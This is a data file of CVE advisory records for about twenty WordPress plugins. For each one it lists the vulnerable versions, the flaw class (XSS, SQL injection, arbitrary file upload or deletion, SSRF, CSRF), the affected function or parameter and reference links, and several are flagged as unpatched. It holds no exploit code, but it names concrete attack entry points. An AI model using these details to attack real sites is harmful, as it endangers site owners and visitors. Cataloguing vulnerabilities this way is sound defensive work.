{"CVE_ID":"CVE-2024-8960","slug":"cowidgets-elementor-addons","versionImpact":"1.2.0","description":"The Cowidgets \u2013 Elementor Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.2.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fac90d55-9ae2-48a8-b82b-fe1626556c7b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fac90d55-9ae2-48a8-b82b-fe1626556c7b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cowidgets-elementor-addons\\\/trunk\\\/inc\\\/widgets-manager\\\/class-widgets-loader.php#L324\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cowidgets-elementor-addons\\\/trunk\\\/inc\\\/widgets-manager\\\/class-widgets-loader.php#L324\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cowidgets-elementor-addons\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cowidgets-elementor-addons\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10910","slug":"grid-plus","versionImpact":"1.3.5","description":"The The Grid Plus \u2013 Unlimited grid layout plugin for WordPress is vulnerable to arbitrary shortcode execution via grid_plus_load_by_category AJAX action in all versions up to, and including, 1.3.5. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/grid-plus\\\/tags\\\/1.3.5\\\/core\\\/ajax_fe.php#L19\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/grid-plus\\\/tags\\\/1.3.5\\\/core\\\/ajax_fe.php#L19\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/grid-plus\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/grid-plus\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/266032a8-a139-4a14-8eda-8be7a66357df?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/266032a8-a139-4a14-8eda-8be7a66357df?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12717","slug":"aklamator-infeed","versionImpact":"2.0.0","description":"The Aklamator INfeed WordPress plugin through 2.0.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5564926a-6b1d-43f4-8147-128472f6b93a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5564926a-6b1d-43f4-8147-128472f6b93a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13720","slug":"wp-image-uploader","versionImpact":"1.0.1","description":"The WP Image Uploader plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the gky_image_uploader_main_function() function in all versions up to, and including, 1.0.1. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-image-uploader\\\/trunk\\\/index.php#L85\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-image-uploader\\\/trunk\\\/index.php#L85\",\"refsource\":\"\",\"tags\":[\"Patch\"]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4af41f69-1335-4199-bf29-c9699de50a16?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4af41f69-1335-4199-bf29-c9699de50a16?source=cve\",\"refsource\":\"\",\"tags\":[\"Third Party Advisory\"]}]"}
{"CVE_ID":"CVE-2024-13820","slug":"melhor-envio-cotacao","versionImpact":"2.15.9","description":"The Melhor Envio plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.15.9 via the 'run' function, which uses a hardcoded hash. This makes it possible for unauthenticated attackers to extract sensitive data including environment information, plugin tokens, shipping configurations, and limited vendor information.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/melhorenvio\\\/wp-melhorenvio-v2\\\/blob\\\/6e2f5bb01c536df9fc84534eb8a27ec99d9601af\\\/Services\\\/TestService.php\",\"name\":\"https:\\\/\\\/github.com\\\/melhorenvio\\\/wp-melhorenvio-v2\\\/blob\\\/6e2f5bb01c536df9fc84534eb8a27ec99d9601af\\\/Services\\\/TestService.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/melhor-envio-cotacao\\\/trunk\\\/Services\\\/TestService.php#L20\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/melhor-envio-cotacao\\\/trunk\\\/Services\\\/TestService.php#L20\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/melhor-envio-cotacao\\\/trunk\\\/Services\\\/TestService.php#L30\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/melhor-envio-cotacao\\\/trunk\\\/Services\\\/TestService.php#L30\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8f093bc-5cd3-41a0-b86b-d00338334d2e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8f093bc-5cd3-41a0-b86b-d00338334d2e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5818","slug":"featured-image-plus","versionImpact":"1.6.4","description":"The Featured Image Plus \u2013 Quick & Bulk Edit with Unsplash plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.6.4 via the fip_get_image_options() function. This makes it possible for authenticated attackers, with administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/featured-image-plus\\\/trunk\\\/inc\\\/admin\\\/block-editor\\\/block-editor-actions.php#L166\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/featured-image-plus\\\/trunk\\\/inc\\\/admin\\\/block-editor\\\/block-editor-actions.php#L166\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6904f168-e06f-4f17-905b-a943a39dfbdb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6904f168-e06f-4f17-905b-a943a39dfbdb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2555","slug":"currency-switcher","versionImpact":"1.1.9","description":"The WPCS \u2013 WordPress Currency Switcher Professional plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the create function in versions up to, and including, 1.1.9. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to create a custom drop-down currency switcher.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2911049\\\/currency-switcher\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2911049\\\/currency-switcher\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd6b5d6d-5f5b-4b38-a25a-02cc1c041d37?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd6b5d6d-5f5b-4b38-a25a-02cc1c041d37?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4426","slug":"absolute-reviews","versionImpact":"1.0.8","description":"The Absolute Reviews plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.0.8. This is due to missing or incorrect nonce validation on the metabox_review_save() function. This makes it possible for unauthenticated attackers to save meta tags via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2548729%40absolute-reviews&new=2548729%40absolute-reviews&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2548729%40absolute-reviews&new=2548729%40absolute-reviews&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec1ee47d-020c-482d-ad6f-663d78e624b8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec1ee47d-020c-482d-ad6f-663d78e624b8?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5062","slug":"wp-charts","versionImpact":"0.7.0","description":"The WordPress Charts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'wp_charts' shortcode in versions up to, and including, 0.7.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-charts\\\/tags\\\/0.7.0\\\/wordpress_charts_js.php#L223\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-charts\\\/tags\\\/0.7.0\\\/wordpress_charts_js.php#L223\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2de2d2c5-1373-45b6-93a0-575713226669?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2de2d2c5-1373-45b6-93a0-575713226669?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-charts\\\/tags\\\/0.7.0\\\/wordpress_charts_js.php#L229\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-charts\\\/tags\\\/0.7.0\\\/wordpress_charts_js.php#L229\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1687","slug":"woo-thank-you-page-customizer","versionImpact":"1.1.2","description":"The Thank You Page Customizer for WooCommerce \u2013 Increase Your Sales plugin for WordPress is vulnerable to unauthorized execution of shortcodes due to a missing capability check on the get_text_editor_content() function in all versions up to, and including, 1.1.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to execute arbitrary shortcodes.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/310afe02-3a51-4633-b359-65ae58d0c032?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/310afe02-3a51-4633-b359-65ae58d0c032?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3041096%40woo-thank-you-page-customizer&new=3041096%40woo-thank-you-page-customizer&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3041096%40woo-thank-you-page-customizer&new=3041096%40woo-thank-you-page-customizer&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3341","slug":"auxin-elements","versionImpact":"2.15.5","description":"The Shortcodes and extra features for Phlox theme plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'aux_gmaps' shortcode in all versions up to, and including, 2.15.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3705f028-9c8d-48b1-8950-160e10038294?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3705f028-9c8d-48b1-8950-160e10038294?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-elements\\\/trunk\\\/includes\\\/elements\\\/gmap.php#L301\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-elements\\\/trunk\\\/includes\\\/elements\\\/gmap.php#L301\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-elements\\\/trunk\\\/includes\\\/elements\\\/gmap.php#L266\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-elements\\\/trunk\\\/includes\\\/elements\\\/gmap.php#L266\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6353","slug":"woo-wallet","versionImpact":"1.5.4","description":"The Wallet for WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'search[value]' parameter in all versions up to, and including, 1.5.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f7d5a077-8836-4c28-8884-5047585a99e5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f7d5a077-8836-4c28-8884-5047585a99e5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-wallet\\\/trunk\\\/includes\\\/class-woo-wallet-ajax.php#L393\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-wallet\\\/trunk\\\/includes\\\/class-woo-wallet-ajax.php#L393\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woo-wallet\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woo-wallet\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3116025\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3116025\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9060","slug":"avif-support","description":"The AVIF & SVG Uploader plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in version 1.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a09113d3-8be0-45fa-b1d7-4eb6ebb1780e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a09113d3-8be0-45fa-b1d7-4eb6ebb1780e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/avif-support\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/avif-support\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3159481\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3159481\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10779","slug":"cowidgets-elementor-addons","versionImpact":"1.2.0","description":"The Cowidgets \u2013 Elementor Addons plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.2.0 via the 'ce_template' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created by Elementor that they should not have access to.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec005f9f-3f63-4d73-9bd5-dc9c4c4b8bfe?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec005f9f-3f63-4d73-9bd5-dc9c4c4b8bfe?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cowidgets-elementor-addons\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cowidgets-elementor-addons\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10590","slug":"halfdata-optin-downloads","versionImpact":"4.07","description":"The Opt-In Downloads plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the admin_upload() function in all versions up to, and including, 4.07. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. Due to the presence of an .htaccess file, this can only be exploited to achieve RCE on NGINX servers, unless another vulnerability is present.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/subscribe-download\\\/2687305\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/subscribe-download\\\/2687305\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5c3c20b8-12cf-4ce6-a1d4-99204df33fcd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5c3c20b8-12cf-4ce6-a1d4-99204df33fcd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12715","slug":"asgard","versionImpact":"0.7","description":"The Asgard Security Scanner WordPress plugin through 0.7 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e1456295-75ba-4dc2-9b1a-dc16a2000db2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e1456295-75ba-4dc2-9b1a-dc16a2000db2\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13715","slug":"zstore-manager-basic","versionImpact":"3.311","description":"The zStore Manager Basic plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the zstore_clear_cache() function in all versions up to, and including, 3.311. This makes it possible for authenticated attackers, with Subscriber-level access and above, to clear the plugin's cache.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zstore-manager-basic\\\/trunk\\\/zstore-manager.php#L441\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zstore-manager-basic\\\/trunk\\\/zstore-manager.php#L441\",\"refsource\":\"\",\"tags\":[\"Patch\"]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/974ffc87-369a-431e-b601-8c6679d963c3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/974ffc87-369a-431e-b601-8c6679d963c3?source=cve\",\"refsource\":\"\",\"tags\":[\"Third Party Advisory\"]}]"}
{"CVE_ID":"CVE-2025-32597","slug":"connect-daily-web-calendar","versionImpact":"1.5.0","description":"Cross-Site Request Forgery (CSRF) vulnerability in George Sexton WordPress Events Calendar Plugin \u2013 connectDaily allows Cross-Site Scripting (XSS). This issue affects WordPress Events Calendar Plugin \u2013 connectDaily: from n\/a through 1.4.8.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/connect-daily-web-calendar\\\/vulnerability\\\/wordpress-wordpress-events-calendar-plugin-connectdaily-plugin-1-4-8-csrf-to-cross-site-scripting-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/connect-daily-web-calendar\\\/vulnerability\\\/wordpress-wordpress-events-calendar-plugin-connectdaily-plugin-1-4-8-csrf-to-cross-site-scripting-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6257","slug":"euro-fxref-currency-converter","versionImpact":"2.0.2","description":"The Euro FxRef Currency Converter plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's currency shortcode in all versions up to, and including, 2.0.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/joostdekeijzer\\\/wp_eurofxref\\\/commit\\\/131108428f0d88dab1070048350bdd54f10c36a0\",\"name\":\"https:\\\/\\\/github.com\\\/joostdekeijzer\\\/wp_eurofxref\\\/commit\\\/131108428f0d88dab1070048350bdd54f10c36a0\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3314562\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3314562\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/euro-fxref-currency-converter\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/euro-fxref-currency-converter\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e7637e96-3afe-46af-b99d-70abe9ca3e20?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e7637e96-3afe-46af-b99d-70abe9ca3e20?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5753","slug":"commercial-real-estate-valuation-calculator","versionImpact":"1.3.2","description":"The Valuation Calculator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018link\u2019 parameter in all versions up to, and including, 1.3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/commercial-real-estate-valuation-calculator\\\/trunk\\\/valuation-calculator.php#L386\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/commercial-real-estate-valuation-calculator\\\/trunk\\\/valuation-calculator.php#L386\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/commercial-real-estate-valuation-calculator\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/commercial-real-estate-valuation-calculator\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eb14f2ed-6ae8-409e-86fc-c305a56f5d5b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eb14f2ed-6ae8-409e-86fc-c305a56f5d5b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-47163","slug":"wp-csv-to-database","versionImpact":"2.6","description":"Cross-Site Request Forgery (CSRF) vulnerability in Tips and Tricks HQ, josh401 WP CSV to Database \u2013 Insert CSV file content into WordPress plugin <= 2.6 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-csv-to-database\\\/wordpress-wp-csv-to-database-plugin-2-6-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-csv-to-database\\\/wordpress-wp-csv-to-database-plugin-2-6-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
